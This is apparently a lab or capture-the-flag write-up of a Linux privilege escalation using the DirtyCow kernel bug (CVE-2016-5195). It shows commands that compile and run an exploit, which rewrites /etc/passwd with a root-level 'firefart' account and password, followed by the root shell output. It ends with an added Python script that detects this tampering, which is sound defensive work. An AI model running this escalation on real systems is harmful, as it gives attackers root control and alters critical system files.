CVE-2016-5195 (DirtyCow):


peas discovered that the target system is vulnerable to the DirtyCow exploit targeting CVE-2016-5195. I found the exploit online.

  • A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.
  • The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.
  • list of patched versions here

Impact

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

How

  • The in-the-wild exploit relied on writing to /proc/self/mem on one side of the race.
  • ptrace(PTRACE_POKEDATA) can write to read-only mappings.
  • The attack relies on racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.
hype@valentine:/tmp/CVE-2016-5195$ gcc -pthread dirty.c -o dirty -lcrypt
hype@valentine:/tmp/CVE-2016-5195$ ./dirty 
/etc/passwd successfully backed up to /tmp/passwd.bak
please enter the new password: qwe123
complete line: qwe123
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
 
mmap: 7f9f9fe6f000
madvise 0
 
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
hype@valentine:/tmp/CVE-2016-5195$ cat /etc/passwd
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
[...]
hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
 
hype@valentine:/tmp/CVE-2016-5195$ su firefart
password: qwe123
firefart@valentine:/tmp/CVE-2016-5195# whoami
firefart
firefart@valentine:/tmp/CVE-2016-5195# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@valentine:/tmp/CVE-2016-5195# hostname
Valentine
firefart@valentine:/tmp/CVE-2016-5195# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b4:d5  
          inet addr:10.10.10.79  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::75ff:5e08:88d0:c60d/64 Scope:Global
          inet6 addr: dead:beef::250:56ff:feb9:b4d5/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b4d5/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:240197 errors:0 dropped:333 overruns:0 frame:0
          tx packets:219130 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:39040324 (39.0 MB)  TX bytes:79726183 (79.7 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:16436  Metric:1
          rx packets:11971 errors:0 dropped:0 overruns:0 frame:0
          tx packets:11971 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:2690360 (2.6 MB)  TX bytes:2690360 (2.6 MB)

System Level Compromise
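The cat /etc/passwd output above shows the two artifacts this exploit leaves behind: a uid 0 account that is not root, and a truncated line ("/sbin:/bin/sh") where the longer firefart entry was written over the original root line and spilled into the next one. The following is an added example (not part of the writeup or of dirty.c) that audits an /etc/passwd file for exactly those indicators; the SAMPLE_PASSWD fragment is constructed from the listing above and is not a real system file.

```python
from typing import Dict, List

# Constructed sample modelled on the tampered /etc/passwd shown in the writeup:
# the firefart line replaced the root entry and clobbered the daemon entry.
SAMPLE_PASSWD = """firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
"""


def audit_passwd(text: str) -> List[Dict[str, object]]:
    """Return findings that indicate /etc/passwd tampering.

    Checked per line: malformed entries (not 7 colon-separated fields, or a
    non-numeric uid) as left by an overwrite; uid 0 accounts other than root;
    a password field other than the shadow placeholders ('x', '*', '!').
    Checked per file: the root account missing entirely.
    """
    findings: List[Dict[str, object]] = []
    saw_root = False
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append({"line": lineno, "kind": "malformed", "detail": line})
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if name == "root":
            saw_root = True
        if uid == 0 and name != "root":
            findings.append({"line": lineno, "kind": "uid0_not_root", "detail": name})
        if pw not in ("x", "*", "!"):
            # A hash (or empty field) here means the account bypasses /etc/shadow.
            findings.append({"line": lineno, "kind": "password_field", "detail": name})
    if not saw_root:
        findings.append({"line": 0, "kind": "root_missing", "detail": "no 'root' entry"})
    return findings


if __name__ == "__main__":
    with open("/etc/passwd", encoding="utf-8") as fh:
        for finding in audit_passwd(fh.read()):
            print(f"line {finding['line']}: {finding['kind']}: {finding['detail']}")
```

Run on the sample, it reports the firefart uid 0 account, its inline hash, the clobbered daemon line and the missing root entry; on an untouched file it returns nothing.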